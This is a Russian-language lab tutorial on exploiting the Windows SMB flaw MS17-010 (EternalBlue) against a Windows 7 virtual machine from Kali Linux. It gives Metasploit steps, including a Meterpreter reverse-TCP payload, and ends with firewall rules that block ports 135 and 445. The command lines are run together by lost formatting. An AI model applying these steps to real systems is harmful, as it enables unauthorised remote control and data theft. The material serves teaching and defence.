
ЛАБОРАТОРНАЯ РАБОТА: АТАКА НА ОПЕРАЦИОННУЮ СИСТЕМУ WINDOWS НА ОСНОВЕ УЯЗВИМОСТИ ПРОТОКОЛА SMB.
В этой лабораторной работе мы будем использовать два компьютера для имитации атаки, основанной на уязвимости в протоколе SMB операционной системы Windows. Один компьютер работает на операционной системе Kali Linux и играет роль злоумышленника (хакера). Второй компьютер играет роль машины-жертвы (жертвы). Машина-жертва работает на операционной системе Windows 7 64-bit и содержит уязвимость SMB. Для этого на машине Kali Linux мы будем использовать эксплойт под названием EternalBlue для атаки на машину Windows 7.
Server Message Block (SMB) — это довольно распространённый протокол обмена файлами на платформе Microsoft Windows. Благодаря этому протоколу SMB компьютеры Windows, подключённые друг к другу в пределах одной сети или одного домена, могут обмениваться файлами между собой. На сегодняшний день SMB также известен под другим названием — Common Internet File Sharing (CIFS).
EternalBlue — это эксплойт, использующий уязвимость протокола SMB через порт 445. Изначально EternalBlue был разработан Агентством национальной безопасности США (NSA). Полное английское название — U.S. National Security Agency. Однако позже, в 2017 году, он был обнародован группой хакеров The Shadow Brokens. В том же году по всему миру произошла масштабная атака вируса-шифровальщика – Ransomware, нацеленная на компьютеры Microsoft Windows. Самой известной из них остаётся вирус WannaCry. На сегодняшний день, хотя эта уязвимость уже была закрыта Microsoft с помощью обновления безопасности MS17-010, большое количество компьютеров в мире, работающих на операционной системе Windows, по-прежнему содержат эту уязвимость. Данная уязвимость зарегистрирована как CVE-2017-0144 (Windows SMB Remote Code Execution Vulnerability). Эта уязвимость чрезвычайно опасна и очень легко эксплуатируется. Примечательно, что для атаки через эту уязвимость протокола SMB хакеру не нужно ничего отправлять жертве или обманом заставлять её загружать и запускать какой-либо вредоносный вирус. То есть жертва, даже ничего не делая, всё равно может быть легко атакована хакером, который захватывает управление компьютером без какого-либо её ведома.
Подготовьте две виртуальные машины, работающие на программном обеспечении VMware Workstation:

На виртуальной машине Kali (атакующий):
ifconfigservice postgresql startservice postgresql statusНа виртуальной машине Windows 7 (жертва):
ipconfigmsfconsole
search ms17_010
use 0 -> set payload windows/x64/meterpreter/reverse_tcp

=> На этом этапе можно считать, что хакер успешно проник в машину-жертву. Теперь хакер может удалять и похищать файлы с машины жертвы, не будучи замеченным. Более того, хакер может загружать и запускать вирусы прямо на этой машине.
Чтобы избежать эксплуатации и злоупотребления протоколом SMB, необходимо выполнить несколько действий:
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"